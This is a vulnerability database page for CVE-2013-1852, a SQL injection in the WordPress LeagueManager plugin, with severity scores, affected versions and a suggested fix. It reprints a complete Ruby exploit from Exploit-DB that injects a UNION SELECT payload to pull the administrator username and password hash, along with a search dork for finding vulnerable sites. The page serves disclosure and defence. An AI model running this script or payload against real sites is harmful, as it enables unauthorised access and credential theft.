CVE-2013-1852 : Detail

CVE-2013-1852

SQL Injection
A03-Injection
0.08%V3
Network
2014-02-05
14h00 +00:00
2014-02-05
13h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

SQL injection vulnerability in leaguemanager.php in the LeagueManager plugin before 3.8.1 for WordPress allows remote attackers to execute arbitrary SQL commands via the league_id parameter in the leaguemanager-export page to wp-admin/admin.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 24789

Publication date : 2013-03-14 23h00 +00:00
Author : Joshua Reynolds
EDB Verified : No

#!/usr/bin/ruby # # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection # Google Dork: inurl:"/wp-content/plugins/leaguemanager/" # Date: 13/03/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip # Version: 3.8 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2013-1852 #----------------------------------------------------------------------------------------- #Description: # #An SQL Injection vulnerability exists in the league_id parameter of a function call made #by the leaguemanager_export page. This request is processed within the leaguemanager.php: # #if ( isset($_POST['leaguemanager_export'])) # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']); # #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection #when making this call: $this->league = $leaguemanager->getLeague($league_id); #The information is then echoed to a CSV file that is then provided. # #Since no authentication is required when making a POST request to this page, #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established #session. # #Fix: # #A possible fix for this would be to cast the league_id to an integer during any #of the function calls. The following changes can be made in the leaguemanager.php file: #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']); # #These functions should also not be available to public requests, and thus session handling #should also be checked prior to the requests being processed within the admin section. # #The responsible disclosure processes were distorted by the fact that the author no longer #supports his well established plugin, and there are currently no maintainers. After #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin #and not patch the vulnerability. # #The following ruby exploit will retrieve the administrator username and the salted #password hash from a given site with the plugin installed: #------------------------------------------------------------------------------------------ #Exploit: require 'net/http' require 'uri' if ARGV.length == 2 post_params = { 'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\ '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--', 'mode' => 'teams', 'leaguemanager_export' => 'Download+File' } target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export" begin resp = Net::HTTP.post_form(URI.parse(target_url), post_params) rescue puts "Invalid URL..." end if resp.nil? print_error "No response received..." elsif resp.code != "200" puts "Page doesn't exist!" else admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/) if(admin_login.length > 0) puts "Username: #{admin_login[0][0]}" puts "Hash: #{admin_login[0][1]}" puts "\nNow go crack that with Hashcat :)" else puts "Username and hash not received. Maybe it's patched?" end end else puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\"" end #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family. # #Contact: #Mail: infosec4breakfast@gmail.com #Blog: infosec4breakfast.com #Twitter: @jershmagersh #Youtube: youtube.com/user/infosec4breakfast

Products Mentioned

Configuraton 0

Kolja_schleich>>Leaguemanager >> Version To (including) 3.8

Kolja_schleich>>Leaguemanager >> Version 1.0

Kolja_schleich>>Leaguemanager >> Version 1.1

Kolja_schleich>>Leaguemanager >> Version 1.2

Kolja_schleich>>Leaguemanager >> Version 1.2.1

Kolja_schleich>>Leaguemanager >> Version 1.2.2

Kolja_schleich>>Leaguemanager >> Version 1.3

Kolja_schleich>>Leaguemanager >> Version 1.4

Kolja_schleich>>Leaguemanager >> Version 1.4.1

Kolja_schleich>>Leaguemanager >> Version 1.4.2

Kolja_schleich>>Leaguemanager >> Version 1.5

Kolja_schleich>>Leaguemanager >> Version 2.0

Kolja_schleich>>Leaguemanager >> Version 2.1

Kolja_schleich>>Leaguemanager >> Version 2.2

Kolja_schleich>>Leaguemanager >> Version 2.3

Kolja_schleich>>Leaguemanager >> Version 2.3.1

Kolja_schleich>>Leaguemanager >> Version 2.4

Kolja_schleich>>Leaguemanager >> Version 2.4.1

Kolja_schleich>>Leaguemanager >> Version 2.5

Kolja_schleich>>Leaguemanager >> Version 2.5.1

Kolja_schleich>>Leaguemanager >> Version 2.5.2

Kolja_schleich>>Leaguemanager >> Version 2.6

Kolja_schleich>>Leaguemanager >> Version 2.6.1

Kolja_schleich>>Leaguemanager >> Version 2.6.2

Kolja_schleich>>Leaguemanager >> Version 2.6.3

Kolja_schleich>>Leaguemanager >> Version 2.7

Kolja_schleich>>Leaguemanager >> Version 2.7.1

Kolja_schleich>>Leaguemanager >> Version 2.8

Kolja_schleich>>Leaguemanager >> Version 2.9

Kolja_schleich>>Leaguemanager >> Version 2.9

Kolja_schleich>>Leaguemanager >> Version 2.9

Kolja_schleich>>Leaguemanager >> Version 2.9.1

Kolja_schleich>>Leaguemanager >> Version 2.9.2

Kolja_schleich>>Leaguemanager >> Version 2.9.3

Kolja_schleich>>Leaguemanager >> Version 3.0

Kolja_schleich>>Leaguemanager >> Version 3.0.1

Kolja_schleich>>Leaguemanager >> Version 3.0.2

Kolja_schleich>>Leaguemanager >> Version 3.0.3

Kolja_schleich>>Leaguemanager >> Version 3.0.4

Kolja_schleich>>Leaguemanager >> Version 3.1

Kolja_schleich>>Leaguemanager >> Version 3.1.1

Kolja_schleich>>Leaguemanager >> Version 3.1.2

Kolja_schleich>>Leaguemanager >> Version 3.1.3

Kolja_schleich>>Leaguemanager >> Version 3.1.4

Kolja_schleich>>Leaguemanager >> Version 3.1.5

Kolja_schleich>>Leaguemanager >> Version 3.1.6

Kolja_schleich>>Leaguemanager >> Version 3.1.7

Kolja_schleich>>Leaguemanager >> Version 3.1.8

Kolja_schleich>>Leaguemanager >> Version 3.1.9

Kolja_schleich>>Leaguemanager >> Version 3.2

Kolja_schleich>>Leaguemanager >> Version 3.2

Kolja_schleich>>Leaguemanager >> Version 3.2.1

Kolja_schleich>>Leaguemanager >> Version 3.2.2

Kolja_schleich>>Leaguemanager >> Version 3.3

Kolja_schleich>>Leaguemanager >> Version 3.3.1

Kolja_schleich>>Leaguemanager >> Version 3.4

Kolja_schleich>>Leaguemanager >> Version 3.4

Kolja_schleich>>Leaguemanager >> Version 3.4

Kolja_schleich>>Leaguemanager >> Version 3.4.1

Kolja_schleich>>Leaguemanager >> Version 3.4.2

Kolja_schleich>>Leaguemanager >> Version 3.5

Kolja_schleich>>Leaguemanager >> Version 3.5.1

Kolja_schleich>>Leaguemanager >> Version 3.5.2

Kolja_schleich>>Leaguemanager >> Version 3.5.3

Kolja_schleich>>Leaguemanager >> Version 3.5.4

Kolja_schleich>>Leaguemanager >> Version 3.5.5

Kolja_schleich>>Leaguemanager >> Version 3.5.6

Kolja_schleich>>Leaguemanager >> Version 3.6

Kolja_schleich>>Leaguemanager >> Version 3.6.1

Kolja_schleich>>Leaguemanager >> Version 3.6.2

Kolja_schleich>>Leaguemanager >> Version 3.6.3

Kolja_schleich>>Leaguemanager >> Version 3.6.4

Kolja_schleich>>Leaguemanager >> Version 3.6.5

Kolja_schleich>>Leaguemanager >> Version 3.6.6

Kolja_schleich>>Leaguemanager >> Version 3.6.7

Kolja_schleich>>Leaguemanager >> Version 3.6.8

Kolja_schleich>>Leaguemanager >> Version 3.6.9

Kolja_schleich>>Leaguemanager >> Version 3.7

References

http://www.exploit-db.com/exploits/24789
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/91442
Tags : vdb-entry, x_refsource_OSVDB